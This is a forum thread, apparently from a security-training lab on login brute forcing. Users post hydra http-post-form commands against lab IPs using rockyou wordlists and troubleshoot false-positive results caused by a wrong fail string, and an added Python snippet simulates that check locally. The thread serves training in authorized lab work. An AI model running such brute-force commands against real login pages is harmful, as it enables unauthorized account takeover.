Login Brute Forcing

I’m on the Login Brute Forcing - Skills Assessment - website - 2nd question. I was able to get past the first authentication page, and am now on the Admin Panel page. I’ve used Burp to get the Post form data. I’ve run the command to crack the password, and I get a success. But then the user name/password doesn’t work. I run it again, and it cracks a different password. I’ve reset my VM and my target… I don’t know what to do, each time I run the command I get a different password and none of them work.

$ hydra -l admin -P /opt/useful/SecLists/Passwords/Leaked-Databases/rockyou.txt -f 144.126.234.86 -s 32429 http-post-form "/admin_login.php:username=^USER^&password=^PASS^:F=<form name='login'"

It’s given me:

login: admin password: 123456789
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

host: 144.126.234.86 login: admin password: 12345
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

host: 144.126.234.86 login: admin password: iloveyou
[STATUS] attack finished for 144.126.234.86 (valid pair found)
1 of 1 target successfully completed, 1 valid password found

Any suggestions?

Double check your parameter names and your fail string.

Also use the rockyou-50.txt wordlist. The whole list isn’t needed. Let me know where you get after that!
-onthesauce

1 Like
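Why a fail string that never appears in the response makes every guess look valid, as an added example that is not part of the thread: a local simulation of the `F=`/`S=` check run against constructed response bodies. The markup, `REAL_PASSWORD` and all function names are assumptions, since the lab's actual HTML is not shown here.

```python
# Constructed response bodies: the lab's real markup is not shown in the thread.
FAILED_BODY = ("<html><body><form name='login' method='post' "
               "action='admin_login.php'><input name='user'>"
               "<input name='pass'></form></body></html>")
SUCCESS_BODY = ("<html><body><h1>Admin Panel</h1>"
                "<a href='logout.php'>Logout</a></body></html>")
REAL_PASSWORD = "constructed-secret"  # placeholder, not a value from the thread


def app_response(password: str) -> str:
    """Stand-in for the target: a failed login re-renders the form."""
    return SUCCESS_BODY if password == REAL_PASSWORD else FAILED_BODY


def reported_valid(body: str, condition: str) -> bool:
    """Apply an http-post-form condition string to one response body.

    F=<text>: the attempt failed if <text> is in the body.
    S=<text>: the attempt succeeded if <text> is in the body.
    No prefix is treated like F=.
    """
    if condition.startswith("S="):
        return condition[2:] in body
    needle = condition[2:] if condition.startswith("F=") else condition
    return needle not in body


def hits(wordlist, condition):
    """Every candidate the condition would report as a valid password."""
    return [pw for pw in wordlist if reported_valid(app_response(pw), condition)]


def condition_detects_failure(condition: str, known_bad_body: str) -> bool:
    """Sanity check: a response to a known-wrong login must count as failed."""
    return not reported_valid(known_bad_body, condition)


if __name__ == "__main__":
    words = ["123456789", "12345", "iloveyou", REAL_PASSWORD]
    for cond in ("F=<form name='login'", "F=<form name='log-in'", "S=logout.php"):
        print(f"{cond!r:28} sane={condition_detects_failure(cond, FAILED_BODY)} "
              f"hits={hits(words, cond)}")
```

A condition for which `condition_detects_failure` returns False against a known-bad response will flag every word in the list, so the "valid" password is simply whichever attempt happened to finish first.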

Ah, I see my mistake now. Thanks - sorry it took a while to try again at this, but I appreciate your help.

1 Like

I am quite sure I am doing everything right, but I just found 16 useless passwords like the three you found. Maybe I am wrong on the fail string?

Here is the command I am using:

hydra -l admin -P SecurityEnvironment/Wordlists/SecLists/Passwords/Leaked-Databases/rockyou-50.txt 134.209.17.36 -s 30942 http-post-form "/admin_login.php:user=^USER^&pass=^PASS^:F=<form name='log-in'"

Look at the hint, the user you should be cracking is ‘user